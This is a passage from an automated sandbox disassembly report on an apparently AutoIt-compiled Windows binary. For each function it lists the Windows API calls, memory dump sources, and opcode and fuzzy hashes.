                • Instruction Fuzzy Hash: 4A317A76201214BFEB218F54CC8AFFB3BA9EF0A715F044055FE089A292C6759C90CBA4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00175622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: _memcmp
                • String ID:
                • API String ID: 2931989736-0
                • Opcode ID: 6a4df6fb0d58bb81bc4fc637d176f667377f2deb7306270a0829fbe71550ccc9
                • Instruction ID: 626700904f63d60923fb3dfaebe90b4a4dad9221363cc9e4a275e16243aced71
                • Opcode Fuzzy Hash: 6a4df6fb0d58bb81bc4fc637d176f667377f2deb7306270a0829fbe71550ccc9
                • Instruction Fuzzy Hash: 8F21A7A5641A0977D71855218D82FFA337FBF213A4F548024FD0C9A581FBB1EE1181A5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00194FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID:
                • String ID: NULL Pointer assignment$Not an Object type
                • API String ID: 0-572801152
                • Opcode ID: 831c9f4d4d567db2492f76cf17295edcb5c72c50a7b3ee2d45d7db60165a5835
                • Instruction ID: 7fee153f8b17c1eb196e2383b9addd9bf38f93be2a47f3cf78a54852df0ac57a
                • Opcode Fuzzy Hash: 831c9f4d4d567db2492f76cf17295edcb5c72c50a7b3ee2d45d7db60165a5835
                • Instruction Fuzzy Hash: 82D1B175A0060A9FDF15CFA8C881BAEB7B6BF48344F148169E915BB281E770DD45CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00151522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON
                Download Yara Rule
                APIs
                • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,001517FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 001515CE
                • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,001517FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00151651
                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,001517FB,?,001517FB,00000000,00000000,?,00000000,?,?,?,?), ref: 001516E4
                • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,001517FB,00000000,00000000,?,00000000,?,?,?,?), ref: 001516FB
                  • Part of subcall function 00143820: RtlAllocateHeap.NTDLL(00000000,?,001E1444,?,0012FDF5,?,?,0011A976,00000010,001E1440,001113FC,?,001113C6,?,00111129), ref: 00143852
                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,001517FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00151777
                • __freea.LIBCMT ref: 001517A2
                • __freea.LIBCMT ref: 001517AE
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                • String ID:
                • API String ID: 2829977744-0
                • Opcode ID: 8593d497716947ad93b92888c5d25b66ff88870258547c51b3525668ccfde370
                • Instruction ID: 1e74c932c7e66c087c6e438781247a4a0c55a1e4f7b0cc392fe9b0ba67c19508
                • Opcode Fuzzy Hash: 8593d497716947ad93b92888c5d25b66ff88870258547c51b3525668ccfde370
                • Instruction Fuzzy Hash: 0D91D872E10216FADB268E74C841BEE7BB5AF49311F140659ED21EF150E735DC48CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00194523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Variant$ClearInit
                • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                • API String ID: 2610073882-625585964
                • Opcode ID: 5a79215ef5d93f5ed084471d05ef8c6c6d66867498f15e435cbe82b8b424289e
                • Instruction ID: 05363746cf6b676a026d7de20a0798f2e3fd61d47c571de100ad75080ee0ac3c
                • Opcode Fuzzy Hash: 5a79215ef5d93f5ed084471d05ef8c6c6d66867498f15e435cbe82b8b424289e
                • Instruction Fuzzy Hash: 9F918E71A00219ABDF28CFA5D884FAEBBB8EF46714F118559F505AB280D7709946CFA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00181187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                Download Yara Rule
                APIs
                • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 0018125C
                • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00181284
                • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 001812A8
                • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 001812D8
                • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 0018135F
                • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 001813C4
                • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00181430
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ArraySafe$Data$Access$UnaccessVartype
                • String ID:
                • API String ID: 2550207440-0
                • Opcode ID: 107d884de9b05c43d7d0ec11dbe01df746f7198b1769b610a2d0999871bd4fc4
                • Instruction ID: 7628da22096d1bbac4c9225b2ba6a698371c927cff165ab5d5ecf7fd6f492c20
                • Opcode Fuzzy Hash: 107d884de9b05c43d7d0ec11dbe01df746f7198b1769b610a2d0999871bd4fc4
                • Instruction Fuzzy Hash: 8D91D372A00219AFDB05EFA4C884BFE77B9FF55315F214029E901E7291D774AA46CF90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0012948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ObjectSelect$BeginCreatePath
                • String ID:
                • API String ID: 3225163088-0
                • Opcode ID: 96f2464e5823ab761105064e981bc7ae9ed60200e51d9781a8a7bbffadb8c0a0
                • Instruction ID: c89ea9926062d4204c2f99d30c0048d8dab7f3266a353df8da86f04faff75dce
                • Opcode Fuzzy Hash: 96f2464e5823ab761105064e981bc7ae9ed60200e51d9781a8a7bbffadb8c0a0
                • Instruction Fuzzy Hash: F7913971E00219EFCB14CFA9DC84AEEBBB8FF49320F14415AE515B7291D778A951CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00193947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON
                Download Yara Rule
                APIs
                • VariantInit.OLEAUT32(?), ref: 0019396B
                • CharUpperBuffW.USER32(?,?), ref: 00193A7A
                • _wcslen.LIBCMT ref: 00193A8A
                • VariantClear.OLEAUT32(?), ref: 00193C1F
                  • Part of subcall function 00180CDF: VariantInit.OLEAUT32(00000000), ref: 00180D1F
                  • Part of subcall function 00180CDF: VariantCopy.OLEAUT32(?,?), ref: 00180D28
                  • Part of subcall function 00180CDF: VariantClear.OLEAUT32(?), ref: 00180D34
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                • String ID: AUTOIT.ERROR$Incorrect Parameter format
                • API String ID: 4137639002-1221869570
                • Opcode ID: 2382d5be97625567be044b7c58c0fcc13eb5fea9b3ea301c0d48b24b4c94640f
                • Instruction ID: 4440a3644cf67b5243ed2c8c6b78da721dc8dab3fdac12a353e5e70243314d7c
                • Opcode Fuzzy Hash: 2382d5be97625567be044b7c58c0fcc13eb5fea9b3ea301c0d48b24b4c94640f
                • Instruction Fuzzy Hash: 1B9169756083059FCB14EF64C48096AB7E5FF99314F14882EF89A9B351DB30EE45CB92
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00194BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 0017000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0016FF41,80070057,?,?,?,0017035E), ref: 0017002B
                  • Part of subcall function 0017000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0016FF41,80070057,?,?), ref: 00170046
                  • Part of subcall function 0017000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0016FF41,80070057,?,?), ref: 00170054
                  • Part of subcall function 0017000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0016FF41,80070057,?), ref: 00170064
                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00194C51
                • _wcslen.LIBCMT ref: 00194D59
                • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00194DCF
                • CoTaskMemFree.OLE32(?), ref: 00194DDA
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                • String ID: NULL Pointer assignment
                • API String ID: 614568839-2785691316
                • Opcode ID: d1df4590cc183bb14a7e646bf929173cb7b21b1cee670347ac79ef7cad8f90c4
                • Instruction ID: 0a84c2818bdc2d77a7ee780437cfb0b4b93be98040c9a3d3e2a2685e92d0b507
                • Opcode Fuzzy Hash: d1df4590cc183bb14a7e646bf929173cb7b21b1cee670347ac79ef7cad8f90c4
                • Instruction Fuzzy Hash: 75912771D0021DAFDF15DFA4D890EEEBBB8BF18314F108169E919A7251EB349A45CFA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001A20FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                Download Yara Rule
                APIs
                • GetMenu.USER32(?), ref: 001A2183
                • GetMenuItemCount.USER32(00000000), ref: 001A21B5
                • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 001A21DD
                • _wcslen.LIBCMT ref: 001A2213
                • GetMenuItemID.USER32(?,?), ref: 001A224D
                • GetSubMenu.USER32(?,?), ref: 001A225B
                  • Part of subcall function 00173A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00173A57
                  • Part of subcall function 00173A3D: GetCurrentThreadId.KERNEL32 ref: 00173A5E
                  • Part of subcall function 00173A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,001725B3), ref: 00173A65
                • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 001A22E3
                  • Part of subcall function 0017E97B: Sleep.KERNEL32 ref: 0017E9F3
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                • String ID:
                • API String ID: 4196846111-0
                • Opcode ID: 20f9a5714ac854764e1058f48dc130ec1c4b2f749d6b4b3b2538ccc7dfa343d7
                • Instruction ID: bbf40f86b87154caf0e7609578223e3ee10354675f78ef89230d84efb57bfb5c
                • Opcode Fuzzy Hash: 20f9a5714ac854764e1058f48dc130ec1c4b2f749d6b4b3b2538ccc7dfa343d7
                • Instruction Fuzzy Hash: 98717F79E00205AFCB14DFA8C845AAEB7F5EF5A310F158469E816EB351DB34ED428B90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001A7E9E Relevance: 10.7, APIs: 7, Instructions: 193windowCOMMON
                Download Yara Rule
                APIs
                • IsWindow.USER32(00DE5878), ref: 001A7F37
                • IsWindowEnabled.USER32(00DE5878), ref: 001A7F43
                • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 001A801E
                • SendMessageW.USER32(00DE5878,000000B0,?,?), ref: 001A8051
                • IsDlgButtonChecked.USER32(?,?), ref: 001A8089
                • GetWindowLongW.USER32(00DE5878,000000EC), ref: 001A80AB
                • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 001A80C3
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                • String ID:
                • API String ID: 4072528602-0
                • Opcode ID: 9854412265a61c45d6402e39ad8320938bba475a72d6c87ae112db969fe6a750
                • Instruction ID: de887af503c5b475d7b69dbacb701dbed2408261081830ab6d884b6f59d23a96
                • Opcode Fuzzy Hash: 9854412265a61c45d6402e39ad8320938bba475a72d6c87ae112db969fe6a750
                • Instruction Fuzzy Hash: B471AE78608204AFEB25DF64CC94FEA7BB5EF1B300F144459F955972A1CB31AE44CB60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0017AEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON
                Download Yara Rule
                APIs
                • GetParent.USER32(?), ref: 0017AEF9
                • GetKeyboardState.USER32(?), ref: 0017AF0E
                • SetKeyboardState.USER32(?), ref: 0017AF6F
                • PostMessageW.USER32(?,00000101,00000010,?), ref: 0017AF9D
                • PostMessageW.USER32(?,00000101,00000011,?), ref: 0017AFBC
                • PostMessageW.USER32(?,00000101,00000012,?), ref: 0017AFFD
                • PostMessageW.USER32(?,00000101,0000005B,?), ref: 0017B020
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: MessagePost$KeyboardState$Parent
                • String ID:
                • API String ID: 87235514-0
                • Opcode ID: 69a69dc347c41b3cc461eecd247466947751f70bad18a3890e1052a56b4a1e31
                • Instruction ID: 86794bfa7b42ea9558345bae8f93bd1b3a66f6035e6a7cd8b35f5a6d47ce6c41
                • Opcode Fuzzy Hash: 69a69dc347c41b3cc461eecd247466947751f70bad18a3890e1052a56b4a1e31
                • Instruction Fuzzy Hash: AB51CFA06086D53DFB3682348885BBEBEB95F46304F08C589F1DD958C2C798A8C8D752
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0017ACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON
                Download Yara Rule
                APIs
                • GetParent.USER32(00000000), ref: 0017AD19
                • GetKeyboardState.USER32(?), ref: 0017AD2E
                • SetKeyboardState.USER32(?), ref: 0017AD8F
                • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0017ADBB
                • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0017ADD8
                • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0017AE17
                • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0017AE38
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: MessagePost$KeyboardState$Parent
                • String ID:
                • API String ID: 87235514-0
                • Opcode ID: 1e7dcd94add94fcd5470f3d8bd8d39ef816b6fd1b0964f54fd612431bf548864
                • Instruction ID: 6dde2b113b045f9949e1f30f8fce2b3b5c2cd6f06619c66a761764ae4dbe034d
                • Opcode Fuzzy Hash: 1e7dcd94add94fcd5470f3d8bd8d39ef816b6fd1b0964f54fd612431bf548864
                • Instruction Fuzzy Hash: 9B51C1A15487D53DFB368364CC95BBEBEB95F86300F48C488E1DD86882D794AC88D762
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0014542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • GetConsoleCP.KERNEL32(00153CD6,?,?,?,?,?,?,?,?,00145BA3,?,?,00153CD6,?,?), ref: 00145470
                • __fassign.LIBCMT ref: 001454EB
                • __fassign.LIBCMT ref: 00145506
                • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00153CD6,00000005,00000000,00000000), ref: 0014552C
                • WriteFile.KERNEL32(?,00153CD6,00000000,00145BA3,00000000,?,?,?,?,?,?,?,?,?,00145BA3,?), ref: 0014554B
                • WriteFile.KERNEL32(?,?,00000001,00145BA3,00000000,?,?,?,?,?,?,?,?,?,00145BA3,?), ref: 00145584
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                • String ID:
                • API String ID: 1324828854-0
                • Opcode ID: 0f222c7878c2fc178d2bf765cba013191fc27fa64e7b27dd19406037670925ab
                • Instruction ID: 4d2ab04e879ffd856f010a7188ee69e4c8e326d40ee8e180c5c8da0ed4c5b5ca
                • Opcode Fuzzy Hash: 0f222c7878c2fc178d2bf765cba013191fc27fa64e7b27dd19406037670925ab
                • Instruction Fuzzy Hash: 2A51D871A00649AFDB11CFA8D885AFEBBF6EF09310F14411AF555EB2A2D730DA41CB60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00132D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                Download Yara Rule
                APIs
                • _ValidateLocalCookies.LIBCMT ref: 00132D4B
                • ___except_validate_context_record.LIBVCRUNTIME ref: 00132D53
                • _ValidateLocalCookies.LIBCMT ref: 00132DE1
                • __IsNonwritableInCurrentImage.LIBCMT ref: 00132E0C
                • _ValidateLocalCookies.LIBCMT ref: 00132E61
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                • String ID: csm
                • API String ID: 1170836740-1018135373
                • Opcode ID: d1fe31267ffbc5ea1a52c1c645ffc245e2794d0243f543875e1898aa5b8644eb
                • Instruction ID: ca6f64e2b738f807c2a6db0e3cfc30feea763e57ecbb0d358bb770a79d1f4ebd
                • Opcode Fuzzy Hash: d1fe31267ffbc5ea1a52c1c645ffc245e2794d0243f543875e1898aa5b8644eb
                • Instruction Fuzzy Hash: DD41A734E00209EBCF14EFA8C845A9EBBB5BF45324F148155F919AB352D735DA45CBD0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001910B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 0019304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0019307A
                  • Part of subcall function 0019304E: _wcslen.LIBCMT ref: 0019309B
                • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00191112
                • WSAGetLastError.WSOCK32 ref: 00191121
                • WSAGetLastError.WSOCK32 ref: 001911C9
                • closesocket.WSOCK32(00000000), ref: 001911F9
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                • String ID:
                • API String ID: 2675159561-0
                • Opcode ID: fac2b656ca98dd6fc8c6e22d3575d2c18ac236a6ac66b56198151443f522bd48
                • Instruction ID: 9110dda6e008526fe78ae0d211e58220c5a6903cfed6912beb5fcd380d6d2e68
                • Opcode Fuzzy Hash: fac2b656ca98dd6fc8c6e22d3575d2c18ac236a6ac66b56198151443f522bd48
                • Instruction Fuzzy Hash: 9241CF31600205BFDB149F64C884BAABBEAFF45364F148069F9169B291C774EDC1CBE1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0017CF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 0017DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0017CF22,?), ref: 0017DDFD
